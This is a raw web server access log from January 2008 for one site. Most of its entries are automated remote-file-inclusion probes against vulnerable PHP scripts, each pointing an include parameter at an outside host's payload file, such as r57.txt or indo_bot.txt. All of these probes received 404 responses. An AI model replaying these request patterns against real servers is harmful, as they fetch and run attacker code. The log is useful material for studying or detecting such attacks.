75.0.141.110 - - [06/Jan/2008:23:24:25 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.230.7.210 - - [06/Jan/2008:23:29:17 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.0.211 - - [06/Jan/2008:23:29:18 -0800] "GET //login.php?dir=http://pucorp.org/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.7.210 - - [06/Jan/2008:23:29:18 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.25.156.89 - - [06/Jan/2008:23:30:32 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.25.156.89 - - [06/Jan/2008:23:30:33 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.25.156.89 - - [06/Jan/2008:23:30:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.27.78 - - [06/Jan/2008:23:35:50 -0800] "GET /bikes/dteel/140CANON/?D=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
151.1.141.17 - - [06/Jan/2008:23:37:39 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [06/Jan/2008:23:37:40 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.240.30.109 - - [06/Jan/2008:23:37:43 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.240.30.109 - - [06/Jan/2008:23:37:43 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:37:57 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:37:57 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.240.30.109 - - [06/Jan/2008:23:37:57 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.240.30.109 - - [06/Jan/2008:23:37:58 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.25.156.89 - - [06/Jan/2008:23:37:58 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.ducklus.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:37:59 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:37:59 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.73 - - [06/Jan/2008:23:39:07 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.13.134.29 - - [06/Jan/2008:23:43:09 -0800] "GET /logs/access_071225.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.134.29 - - [06/Jan/2008:23:43:09 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.134.29 - - [06/Jan/2008:23:43:10 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.134.29 - - [06/Jan/2008:23:43:10 -0800] "GET /logs/access_071216.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.104 - - [06/Jan/2008:23:43:16 -0800] "GET /logs/access_071225.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.104 - - [06/Jan/2008:23:43:17 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.104 - - [06/Jan/2008:23:43:17 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.134.29 - - [06/Jan/2008:23:43:18 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.104 - - [06/Jan/2008:23:43:18 -0800] "GET /logs/access_071216.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.104 - - [06/Jan/2008:23:43:29 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:23:44:39 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:23:44:40 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:23:44:40 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:46:53 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:46:53 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:46:54 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:46:55 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:47:01 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:47:01 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [06/Jan/2008:23:47:24 -0800] "GET /index.php?page=http://66.197.235.245/~uploads/ajax/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
67.19.192.212 - - [06/Jan/2008:23:47:24 -0800] "GET /logs/index.php?page=http://66.197.235.245/~uploads/ajax/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
67.19.192.212 - - [06/Jan/2008:23:47:39 -0800] "GET /index.php?page=http://66.197.235.245/~uploads/ajax/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
67.19.192.212 - - [06/Jan/2008:23:47:39 -0800] "GET /logs/index.php?page=http://66.197.235.245/~uploads/ajax/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:47:40 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:47:42 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.134.29 - - [06/Jan/2008:23:47:46 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rmazzotta.nexodus.de/components/com_simpleboard/graph/co.txt????????????????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.134.29 - - [06/Jan/2008:23:47:46 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rmazzotta.nexodus.de/components/com_simpleboard/graph/co.txt????????????????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.148.134 - - [06/Jan/2008:23:47:54 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:48:00 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:48:13 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:52:15 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:52:15 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:52:17 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:52:30 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:52:31 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:52:31 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:52:33 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:52:34 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:52:34 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:52:37 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:52:37 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:52:37 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:52:46 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:52:52 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [06/Jan/2008:23:52:53 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.172.42 - - [06/Jan/2008:23:52:58 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:23:55:25 -0800] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:23:55:26 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:23:55:26 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.1.141.17 - - [06/Jan/2008:23:55:31 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [06/Jan/2008:23:55:31 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [06/Jan/2008:23:55:31 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [06/Jan/2008:23:56:00 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:23:57:25 -0800] "GET /logs/access_071224.log//akocomments.php?mosConfig_absolute_path=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:23:57:25 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:23:57:26 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.230 - - [07/Jan/2008:00:00:09 -0800] "GET /minamijewelry/?M=D HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [07/Jan/2008:00:01:13 -0800] "GET /minamijewelry/html/moon.html HTTP/1.0" 200 20921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.97.20.22 - - [07/Jan/2008:00:01:56 -0800] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.134.29 - - [07/Jan/2008:00:02:30 -0800] "GET /logs/access_071225.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rmazzotta.nexodus.de/components/com_simpleboard/graph/co.txt????????????????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.134.29 - - [07/Jan/2008:00:02:31 -0800] "GET /logs/access_071216.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://rmazzotta.nexodus.de/components/com_simpleboard/graph/co.txt????????????????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.218.0.211 - - [07/Jan/2008:00:03:50 -0800] "GET /logs/access_071229.log//login.php?dir=http://pucorp.org/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.218.0.211 - - [07/Jan/2008:00:03:51 -0800] "GET /logs//login.php?dir=http://pucorp.org/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.86.232.194 - - [07/Jan/2008:00:05:06 -0800] "GET /logs//login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.86.232.194 - - [07/Jan/2008:00:05:07 -0800] "GET //login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.98.172.42 - - [07/Jan/2008:00:05:11 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [07/Jan/2008:00:05:11 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [07/Jan/2008:00:05:11 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [07/Jan/2008:00:05:12 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [07/Jan/2008:00:05:12 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.172.42 - - [07/Jan/2008:00:05:12 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [07/Jan/2008:00:05:37 -0800] "GET /mobileoffice/?N=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.7.210 - - [07/Jan/2008:00:06:03 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.7.210 - - [07/Jan/2008:00:06:05 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.50.202.10 - - [07/Jan/2008:00:06:52 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.vass0ra.110mb.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.50.202.10 - - [07/Jan/2008:00:06:58 -0800] "GET //skin/zero_vote/error.php?dir=http://www.vass0ra.110mb.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.50.202.10 - - [07/Jan/2008:00:07:03 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.vass0ra.110mb.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.50.202.10 - - [07/Jan/2008:00:15:06 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.vass0ra.110mb.com/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.240.30.109 - - [07/Jan/2008:00:15:28 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.240.30.109 - - [07/Jan/2008:00:15:28 -0800] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.240.30.109 - - [07/Jan/2008:00:15:28 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.7.210 - - [07/Jan/2008:00:16:39 -0800] "GET /logs//login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.7.210 - - [07/Jan/2008:00:16:40 -0800] "GET //login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.240.30.109 - - [07/Jan/2008:00:18:05 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.240.30.109 - - [07/Jan/2008:00:18:06 -0800] "GET //skin/zero_vote/error.php?dir=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.240.30.109 - - [07/Jan/2008:00:18:06 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.97.20.22 - - [07/Jan/2008:00:18:08 -0800] "GET /logs/access_071229.log//login.php?dir=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [07/Jan/2008:00:18:08 -0800] "GET //login.php?dir=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [07/Jan/2008:00:18:09 -0800] "GET /logs//login.php?dir=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [07/Jan/2008:00:18:09 -0800] "GET /index.php?page=http://66.197.235.245/~uploads/ajax/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
67.19.192.212 - - [07/Jan/2008:00:18:10 -0800] "GET /logs/index.php?page=http://66.197.235.245/~uploads/ajax/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
84.240.30.109 - - [07/Jan/2008:00:18:57 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.210.20.23 - - [07/Jan/2008:00:20:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
82.210.20.23 - - [07/Jan/2008:00:20:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
84.240.30.109 - - [07/Jan/2008:00:21:20 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
